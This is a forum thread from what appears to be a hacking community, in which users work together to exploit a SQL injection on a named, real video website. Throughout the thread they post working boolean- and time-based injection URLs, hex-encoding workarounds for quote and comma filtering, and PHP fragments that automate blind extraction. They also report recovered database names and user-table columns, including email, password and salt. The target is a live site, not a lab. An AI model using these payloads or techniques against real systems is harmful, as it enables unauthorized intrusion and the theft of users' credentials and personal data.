• XSS.stack #1 – первый литературный журнал от юзеров форума

Need Help In SQL Injection.

Отслеживать
Darkforce

Darkforce

CD-диск
Пользователь
Регистрация
12.04.2020
Сообщения
12
Реакции
1
Dear Friends,

I found SQL injection in one website but I can't fetch the database via sqlmap and manually also.

Here is the detail:

Link: https://xdporner.com/videos.php?c=1\

Please help me with this. if you reach to database please all step in txt file.

Sorry for poor English

Thanks in advance.
 
Hello, Im at work so I can't help much right now but I did some quick tests on my phone's browser and 1=1 / 1=2 works well. You could start from it to blind exfiltrate data.

Код: 
https://xdporner.com/videos.php?c=1c=1 AND 1=1

the boolean based logic with my example resolves a video named "Man first" in first video each time, you can mass refresh you'll keep this result.
And if you do 1=2 you will get a random video here each time.

Btw I'll test more later because its weird sqlmap doesnt success

found out that you can evaluate functions by doing (order higher than 1 gives error, a bit strange)
Код: 
https://xdporner.com/videos.php?c=1 and 0=1 union all select db_name()
will return
1646326725645.png

and
Код: 
view-source:https://xdporner.com/videos.php?c=1 and 0=1 union all select SLEEP()
makes the page never respond. Even if you sleep(5) it will never respond, had this issue one time on a redmine sql injection, you just need to try catch the timeout status and set the timeout on 3 sec in your script to evaluate a false or true output.
 
Последнее редактирование:
I have been trying some things and it looks like single quotes and double quotes are html encoded.
Still I think I could go around that but I notice that substring is also escaped? Because when I i.e.
try: substring(database(),1,1) then I get a SQL error. But things like this work:
and concat(char(0x78)) = concat(char(0x78)) so wtf. Also the user has priviledges to the information_schema
database, which is also handy. So if somebody knows an alternative for substring then let us know ^^
 
no1 сказал(а):
Hello, Im at work so I can't help much right now but I did some quick tests on my phone's browser and 1=1 / 1=2 works well. You could start from it to blind exfiltrate data.

Код: 
https://xdporner.com/videos.php?c=1c=1 AND 1=1

the boolean based logic with my example resolves a video named "Man first" in first video each time, you can mass refresh you'll keep this result.
And if you do 1=2 you will get a random video here each time.

Btw I'll test more later because its weird sqlmap doesnt success

found out that you can evaluate functions by doing (order higher than 1 gives error, a bit strange)
Код: 
https://xdporner.com/videos.php?c=1 and 0=1 union all select db_name()
will return
Посмотреть вложение 33104
and
Код: 
view-source:https://xdporner.com/videos.php?c=1 and 0=1 union all select SLEEP()
makes the page never respond. Even if you sleep(5) it will never respond, had this issue one time on a redmine sql injection, you just need to try catch the timeout status and set the timeout on 3 sec in your script to evaluate a false or true output.
Thanks for good explaination☺
 
no1 сказал(а):
Hello, Im at work so I can't help much right now but I did some quick tests on my phone's browser and 1=1 / 1=2 works well. You could start from it to blind exfiltrate data.

Код: 
https://xdporner.com/videos.php?c=1c=1 AND 1=1

the boolean based logic with my example resolves a video named "Man first" in first video each time, you can mass refresh you'll keep this result.
And if you do 1=2 you will get a random video here each time.

Btw I'll test more later because its weird sqlmap doesnt success

found out that you can evaluate functions by doing (order higher than 1 gives error, a bit strange)
Код: 
https://xdporner.com/videos.php?c=1 and 0=1 union all select db_name()
will return
Посмотреть вложение 33104
and
Код: 
view-source:https://xdporner.com/videos.php?c=1 and 0=1 union all select SLEEP()
makes the page never respond. Even if you sleep(5) it will never respond, had this issue one time on a redmine sql injection, you just need to try catch the timeout status and set the timeout on 3 sec in your script to evaluate a false or true output.
its means its not possible to fetch database.?
 
SpotnikSignal сказал(а):
I have been trying some things and it looks like single quotes and double quotes are html encoded.
Still I think I could go around that but I notice that substring is also escaped? Because when I i.e.
try: substring(database(),1,1) then I get a SQL error. But things like this work:
and concat(char(0x78)) = concat(char(0x78)) so wtf. Also the user has priviledges to the information_schema
database, which is also handy. So if somebody knows an alternative for substring then let us know ^^
Got an explainatio for this I think look :
1646480761524.png

(don't judge my hackbar shitty extention xD I'm at work and can't install burp)

As you can see I was testing out some blind querys syntax and I figured out that when you input a " , " it splits the query. The FROM info..... disapeard.
I think the query is built by an algo that splits some parts of the query with " , "

If you try without " , " with same syntax (wich is dumb becaus substrin takes not only one arg but we do it for testing purposes) then :
1646481018410.png

Query didn't get splitted.
 
Update comrades, I got a query working
Код: 
https://xdporner.com/videos.php
?c=1 and (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_name LIKE 0x257573657225 limit 1,1) = 1
This is a valid query to check if a table with name like '%user%' exists.
if = 1 the first video loaded is "man first" if = 0, first video is always random. Same behavior than with the classic 1=1 and 1=2 in my first answear.
I have noted the following behaviours :

- simple, double quote are note usable beause html encoded.
- back quote ` surrounding a string make the database consider the string as a column name so cant use it to build strings
- 0x0000000 hex string format works without quotes so we are happy, it also works in LIKE operators , you can do foo LIKE %user% into foo LIKE 0x75736572
- " , " seems to split the query. It can be usefull if the context is nicely understood but for now let's try to avoid functions that need multiple parameters (NOTE in limit it doesn split wtf)
- WHERE tablename = 0x757365 for example doesn't work (wtf), use LIKE instead equal for example and (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema = 0x78646462 AND table_name LIKE 0x75736572) = 1 will return true and there is no wildcards but replace the LIKE by = and it returns false. (I have checked by bellow logic that there is a user table in xddb so it's not false positive)

Partial query in my notes
db name : xddb
[... ? ...] AND `idVideo` IN (SELECT `idVideo` FROM `VideoCategory` WHERE `idCategory` [... ? ...] AND (`txtName` LIKE '%%' OR `id [... ? ...]

The pattern at the beggining of my post can be used to exfiltrate data. you need to write a simple python script to automate it but i'll give you some request example
Код: 
1 table LIKE user in database xddb
https://xdporner.com/videos.php
?c=1 and (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema = 0x78646462 AND table_name LIKE 0x75736572) = 1

2 tables LIKE user____ in database xddb
https://xdporner.com/videos.php
?c=1 and (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema = 0x78646462 AND table_name LIKE 0x757365725f5f5f5f) = 2

1 table LIKE user_____ in database xddb
https://xdporner.com/videos.php
?c=1 and (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema = 0x78646462 AND table_name LIKE 0x757365725f5f5f5f5f) = 1

3 table LIKE user________ in database xddb
https://xdporner.com/videos.php
?c=1 and (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema = 0x78646462 AND table_name LIKE 0x757365725f5f5f5f5f5f5f5f) = 3

1 table LIKE user____________ in database xddb
https://xdporner.com/videos.php
?c=1 and (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema = 0x78646462 AND table_name LIKE 0x757365725f5f5f5f5f5f5f5f5f5f5f5f) = 1
all of these eturn boolean true so you can automate the users tables exfiltration like this. I'm pretty sure you can even write a sqlmap tamper.py script to help it to inject but not sure, I don't use tampers scripts usually I write my scripts when I find a website sqlmap doesnt like.
 
Последнее редактирование:
no1 сказал(а):
Update comrades, I got a query working
Код: 
https://xdporner.com/videos.php
?c=1 and (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_name LIKE 0x257573657225 limit 1,1) = 1
ow wow nice work man, I also tried a char attack but with the following technique:
https://xdporner.com/videos.php?c=1 and (select count(*) from information_schema.schemata where schema_name like CONCAT(CHAR(0x27),CHAR(0x25),CHAR(0x69),CHAR(0x25),CHAR(0x27))) > 0

But I didn't know you could write it like: 0x257573657225

I will definitely try to incorporate this knowledge into the script I've made (already found some stuff to fix on this example)
so that I can automatically char attack and get the data back (in examples like this, I do not condone attacking real targets).
Normally I use substring to chop up the string into single characters and do a check loop. Already was thinking of converting it
to ascii so I only have to check 0-9 and get a more detailed response.

I personally noticed you can distinguish the "good" and "bad" reply with the following data:
good response contains: "<span class="subheading">in 1080p </span>"
bad response contains: "Unfortunately, there is no results in 1080p".

Nice find ^^
 
SpotnikSignal сказал(а):
ow wow nice work man, I also tried a char attack but with the following technique:
https://xdporner.com/videos.php?c=1 and (select count(*) from information_schema.schemata where schema_name like CONCAT(CHAR(0x27),CHAR(0x25),CHAR(0x69),CHAR(0x25),CHAR(0x27))) > 0

But I didn't know you could write it like: 0x257573657225

I will definitely try to incorporate this knowledge into the script I've made (already found some stuff to fix on this example)
so that I can automatically char attack and get the data back (in examples like this, I do not condone attacking real targets).
Normally I use substring to chop up the string into single characters and do a check loop. Already was thinking of converting it
to ascii so I only have to check 0-9 and get a more detailed response.

I personally noticed you can distinguish the "good" and "bad" reply with the following data:
good response contains: "<span class="subheading">in 1080p </span>"
bad response contains: "Unfortunately, there is no results in 1080p".

Nice find ^^
The reason why substring doesnt work is because of the " , " splitting the query programaticly in the backend. I had the same issue by tring to user convert(varchar(mac),binary(max),column_foo) to get a full hex of a column and make some atithmetic calculations to optimize number of request for data exfiltration. Didnt work :/

Im happy that it can help you to improve your work, wich i saw and nice work by the way. If you are interested into web app vulnerabilities, especially sqli feel free to dm me, we could exchange sometimes :)
 
Последнее редактирование:
no1 сказал(а):
The reason why substring doesnt work is because of the " , " splitting the query programaticly in the backend. I had the same issue by tring to user convert(varchar(mac),binary(max),column_foo) to get a full hex of a column and make some atithmetic calculations to optimize number of request for data exfiltration. Didnt work :/

Im happy that it can help you to improve your work, wich i saw and nice work by the way. If you are interested into web app vulnerabilities, especially sqli feel free to dm me, we could exchange sometimes :)
thanks! and yea cool same for you, if you have some questions you can always contact me on my telegram (see profile) ^^
 
no1 сказал(а):
The reason why substring doesnt work is because of the " , " splitting the query programaticly in the backend. I had the same issue by tring to user convert(varchar(mac),binary(max),column_foo) to get a full hex of a column and make some atithmetic calculations to optimize number of request for data exfiltration. Didnt work :/

Im happy that it can help you to improve your work, wich i saw and nice work by the way. If you are interested into web app vulnerabilities, especially sqli feel free to dm me, we could exchange sometimes :)

UPDATE:
So today I have spend multiple hours trying to figure this one out, but I think I found something useful.

I started by making a script that would check every character from left to right without substring. Because like you found out a comma destroys the query.
I wanted to this with the single left percent technique in a like query. So i.e. [select 1 where 'test' like '%te'] should give no result because the left part of
'lol test' doesn't begin with 'te'. but somehow that doesn't work with your technique where (in this example) you would do 0x257465 (so single percent).

In the script it will look like this:
$dq_1 = " AND (SELECT 1 FROM information_schema.tables WHERE lower( (SELECT concat(table_name) from information_schema.tables where table_schema like 0x257864646225 limit 1) ) LIKE 0x25" . bin2hex($single_string_row) . bin2hex($single_char) . "25 limit 1,1) = 1";
$full_query = curl + request + dq_1;
but now I found out that it actually can work with double percentage, there is only one weird rule:
- you need to guess a unique part in a given output that starts in the beginning of said output.

so let's say you have a string 'thumb 123 test' that you would like to get out. If you start with '%t%'
then ok nice you get a result back. Then you continue with the next letter (from a - z) then the next
"good" output would be '%te%', skipping 'thumb 123'.

So in relation to the site if you do a query on the database name and start it with the given input x then you get the full name back, otherwise it will only output 'b'.
Currently I did a query on the column_names on the correct db with the starting value of 'us' and got out (not the full output):
usideo,boollike,datecreation,iduser,txtname,txtemail,txtdescription,datecreation,txtpassword,txtsalt,txtprofilepicture,txtcoverpicture,idrole,iduseractivity,txtip
and then you can add the output to the start and the result will become 100% correct the more characters you have, you just don't know where it starts retrieving data xD

btw: limit 1,1 doesn't work but limit 1 offset 1 could work ^^
 
Последнее редактирование:
SpotnikSignal сказал(а):
UPDATE:
So today I have spend multiple hours trying to figure this one out, but I think I found something useful.

I started by making a script that would check every character from left to right without substring. Because like you found out a comma destroys the query.
I wanted to this with the single left percent technique in a like query. So i.e. [select 1 where 'test' like '%te'] should give no result because the left part of
'lol test' doesn't begin with 'te'. but somehow that doesn't work with your technique where (in this example) you would do 0x257465 (so single percent).

In the script it will look like this:

but now I found out that it actually can work with double percentage, there is only one weird rule:
- you need to guess a unique part in a given output that starts in the beginning of said output.

so let's say you have a string 'thumb 123 test' that you would like to get out. If you start with '%t%'
then ok nice you get a result back. Then you continue with the next letter (from a - z) then the next
"good" output would be '%te%', skipping 'thumb 123'.

So in relation to the site if you do a query on the database name and start it with the given input x then you get the full name back, otherwise it will only output 'b'.
Currently I did a query on the column_names on the correct db with the starting value of 'us' and got out (not the full output):

and then you can add the output to the start and the result will become 100% correct the more characters you have, you just don't know where it starts retrieving data xD

btw: limit 1,1 doesn't work but limit 1 offset 1 could work ^^
"[select 1 where 'test' like '%te'] should give no result because the left part of
'lol test' doesn't begin with 'te'."
This is incorrect, I think you got it wrong, the % wildcard means anything and any long so if my string is "efiujfueiufneTEST" and I do SELECT string FROM foo WHERE string LIKE '%TEST' it will find something BUT if I search SELECT string FROM foo WHERE string LIKE 'TEST%' it will return nothing.
If you search for %user% , the string 'user' will match because any long, and there is long 0 so, to test if there is no chars before the keyword use the "_" wich means any char, lenghth 1 for exemple the string "AAAtest" will match LIKE '___test', '%___test', '%test' but will not match '_test' or '__________test'
Talking about wildcards, if you want to use the char '%' or '_' or others that are included in LIKE documentation, use escapement sequence as [_]
Код: 
....,"y","z","[_]","[-]",".","0","1",.....

By the way the limit 1,1 works fine for me, my whole script logic works wouldnt work without it, I use it to select index and it's extracting datas so, seems to work.

I have not much time to test things and optimize my script by you should try to compare the result of two hex string obtained by HEX() method on table name and guess to see if we can make a comparaison logic better than brute forcing characters alphabeticly
 
Последнее редактирование:
no1 сказал(а):
"[select 1 where 'test' like '%te'] should give no result because the left part of
Ah yea stupid me, you're right I got it switched around haha xD man that is really dumb. That's what you get I guess doing this at night haha
Thanks for pointing this out to me! So single quote DOES work here looking at this example:
[site]?c=1 and (SELECT 1 FROM information_schema.tables WHERE database() LIKE 0x7825 limit 1) = 1
also nice about that "_", didn't know about that one ^^ but for this script you can just use a single "%" wildcard to make it work.
And yea because I did the wildcard wrong I also thought the hex like query didn't work haha because this works now:
[site]?c=1 and (SELECT 1 FROM information_schema.tables WHERE hex(database()) LIKE 0x373825 limit 1) = 1
So yea hex is better because then you get 100% correct input (already have a couple of scripts like that)
also thought you can make a chart of which characters are used more (and less), see which hex characters it corresponds with
and sort a char array on that. That can be a little faster. But as this is error based injection then I would think this is the only way?

Also yes limit 1,1 works but I still have the feeling the ,1 doesn't do anything, it just doesn't throw a sql error. But still if you want to use
offset then you can just type offset I guess, so it's not separated by the ",".

Thanks for the info!
 
Последнее редактирование:
SpotnikSignal сказал(а):
Ah yea stupid me, you're right I got it switched around haha xD man that is really dumb. That's what you get I guess doing this at night haha
Thanks for pointing this out to me! So single quote DOES work here looking at this example:

also nice about that "_", didn't know about that one ^^ but for this script you can just use a single "%" wildcard to make it work.
And yea because I did the wildcard wrong I also thought the hex like query didn't work haha because this works now:

So yea hex is better because then you get 100% correct input (already have a couple of scripts like that)
also thought you can make a chart of which characters are used more (and less), see which hex characters it corresponds with
and sort a char array on that. That can be a little faster. But as this is error based injection then I would think this is the only way?

Also yes limit 1,1 works but I still have the feeling the ,1 doesn't do anything, it just doesn't throw a sql error. But still if you want to use
offset then you can just type offset I guess, so it's not separated by the ",".

Thanks for the info!
No worries the the hardest mistakes to resolve are something the most obvious ^^
 
captain1337 сказал(а):
Looks like a Straight Forward SQLi ....
you can just use SQLMap to dump the database or try to spawn a shell.....
He said "I found SQL injection in one website but I can't fetch the database via sqlmap and manually also."
So let's assume sqlmap fails, already seen some injections of this format so I'm used to configure sqlmap for it, configured sqlmap with prefix and suffix arguments, tampered the strings into hex via py scripts but sqlmap fails. It could have something related to the fact some data begin by blanks.

By the way the format of the injection and the researchs described in the posts can make you guess stacked querys are not an option here and so the sqli cannot be used to drop a shell.
 
captain1337 сказал(а):
Looks like a Straight Forward SQLi ....
you can just use SQLMap to dump the database or try to spawn a shell.....

Может быть, он хотел бы понять, как работает SQLi, прежде чем использовать готовый инструмент? Да, SQLmap полезен и является хорошим инструментом, но понимание того, как все работает, очень важно. Разве не любопытство привело нас сюда?
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх